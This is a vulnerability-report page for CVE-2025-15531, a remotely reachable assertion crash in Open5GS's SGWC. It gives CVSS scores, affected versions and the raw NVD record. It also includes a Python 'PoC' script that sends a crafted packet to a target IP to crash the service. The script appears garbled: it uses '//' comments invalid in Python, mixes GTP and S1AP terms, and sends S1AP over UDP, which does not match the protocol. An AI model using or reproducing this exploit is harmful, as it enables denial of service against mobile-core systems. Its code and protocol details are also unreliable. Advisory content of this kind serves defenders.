Security Vulnerability Report
中文
CVE-2025-15531 CVSS 5.3 MEDIUM

CVE-2025-15531

Published: 2026-01-17 16:16:05
Last Modified: 2026-02-23 09:16:28
Source: [email protected]

Description

A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. The manipulation leads to reachable assertion. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-15531 PoC - Open5GS SGWC Bearer Add Assertion // Target: Open5GS <= 2.7.5 // Type: Denial of Service via Reachable Assertion // This PoC demonstrates triggering the assertion in sgwc_bearer_add // by sending a crafted Create Session Request with invalid bearer parameters import socket import struct def create_crafted_s1ap_message(): """Generate a crafted S1AP message to trigger sgwc_bearer_add assertion""" # S1AP message header protocol_id = 0x00 # S1AP procedure_code = 0x0d # Initial Context Setup Request / Bearer establishment # Construct message with malformed bearer information message = bytearray() # MME UE S1AP ID message.extend([0x00, 0x0f]) # IEI for MME UE S1AP ID message.extend([0x00, 0x04]) # Length message.extend([0x00, 0x00, 0x00, 0x01]) # UE ID value # eNB UE S1AP ID message.extend([0x00, 0x10]) # IEI for eNB UE S1AP ID message.extend([0x00, 0x04]) # Length message.extend([0x00, 0x00, 0x00, 0x02]) # UE ID value # Data Radio Bearer ID (crafted for assertion trigger) message.extend([0x00, 0x57]) # IEI for Data Radio Bearer ID message.extend([0x00, 0x01]) # Length message.extend([0x00]) # Invalid/zero bearer ID to trigger assertion # E-RAB ID List (malformed) message.extend([0x00, 0x5b]) # IEI for E-RAB to Be Setup List message.extend([0x00, 0x10]) # Length message.extend([0x00, 0x01, 0x00, 0x0c]) # E-RAB ID: 1 message.extend([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) return bytes(message) def send_exploit(target_ip, target_port=36412): """Send crafted packet to Open5GS SGWC""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) payload = create_crafted_s1ap_message() try: sock.sendto(payload, (target_ip, target_port)) print(f"[+] Crafted packet sent to {target_ip}:{target_port}") print(f"[+] Payload length: {len(payload)} bytes") print("[*] Expected result: Open5GS sgwc_bearer_add assertion failure") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-15531.py <target_ip>") sys.exit(1) send_exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15531", "sourceIdentifier": "[email protected]", "published": "2026-01-17T16:16:05.003", "lastModified": "2026-02-23T09:16:28.097", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. The manipulation leads to reachable assertion. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en Open5GS hasta 2.7.5. Esta vulnerabilidad afecta a la función sgwc_bearer_add del archivo src/sgwc/context.c. La manipulación conduce a una aserción alcanzable. El ataque es posible de llevar a cabo remotamente. El exploit está disponible públicamente y podría ser usado. El informe del problema está marcado como ya solucionado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4233", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4233#issue-3776216182", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341598", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341598", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729339", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.